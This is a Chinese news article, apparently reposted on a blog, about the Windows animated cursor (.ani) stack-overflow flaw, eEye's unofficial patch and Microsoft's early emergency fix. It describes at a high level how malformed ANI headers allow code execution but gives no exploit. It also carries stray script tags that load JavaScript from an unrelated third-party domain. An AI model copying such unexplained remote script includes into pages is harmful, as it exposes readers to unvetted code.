官方民间齐上阵 对付Windows动画光标漏洞

<script language='javascript' src='http://www.shiqiaotou.com/donetk/Header.js'></script>

  上周四,微软发表了一份安全报告,确认了Windows动画光标(.ani)漏洞的存在和危害性。

  上周五,Windows动画光标(.ani)漏洞即被利用,很多微软操作系统的用户遭到恶意攻击。

  上周六,非官方组织EEYE开发了针对此漏洞的补丁(作者Derek Soeder - eEye Digital Security),经测试,该补丁可很好的解决该漏洞引发的问题, 安装此补丁即可杜绝该漏洞导致的问题。

  点击下载补丁

  上周日,也许是微软面子上有些挂不住了,这么大的一个安全漏洞被别人发现,而且第一个漏洞补丁程序是由“民间人士”发布,微软于美国当地时间星期日表示“会很快提前拿出一个紧急补丁,以应付遭到利用的Windows安全漏洞。”

  Windows动画光标(.ani)漏洞并不针对Vista,Windows 2000 SP4、Windows XP SP2、Windows Server 2003 SP2均未能幸免。

  微软在一封E-mail中表示,由于相关测试已经提前完成,所以微软决定在当地时间本周二就发布安全补丁,不再等到4月10日的月度“补丁日”。由此也可以看出该漏洞的危害程度有多大!

  微软称,对攻击数据的分析显示“攻击和用户受影响范围非常有限”,用户只要更新发布后的补丁即可“确保安全”。此外,微软称准备追究攻击者法律责任。

附Windows动画光标(.ani)漏洞攻击的相关特点

  Microsoft Windows在处理畸形的动画图标文件 (.ani) 时存在缓冲区溢出漏洞, 远程攻击者可能利用此漏洞控制用户机器。Microsoft Windows在处理畸形文件 (.ani) 时没有正确地验证ANI头中所指定的大小,导致栈溢出漏洞。如果用户受骗使用IE访问了恶意站点或打开了恶意的邮件消息的话,就会触发这个溢出,导致执行任意代码。

  Windows资源管理器也会处理一些文件扩展名的ANI文件,如.ani、.cur、.ico等. 受影响的系统包括: Microsoft Windows Vista 所有版本; Microsoft Windows XP 所有版本;Microsoft Windows Server 2003 SP1; Microsoft Windows Server 2003; Microsoft Windows 2000 所有版本.

  目前国内外很多网站都开始利用该漏洞传播恶意软件及盗号木马、蠕虫病毒,该漏洞利用程序通常伪装成一个图片,只要点击了带有恶意代码图片的网站或邮件就会被感染上恶意程序,无论是IE6或IE7,或是FireFoxOperaIE浏览器均在攻击范围内。


文章来源于 http://vista.zol.com.cn 版权归原作者所有<script language='javascript' src='http://www.shiqiaotou.com/donetk/Footer.js'></script>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值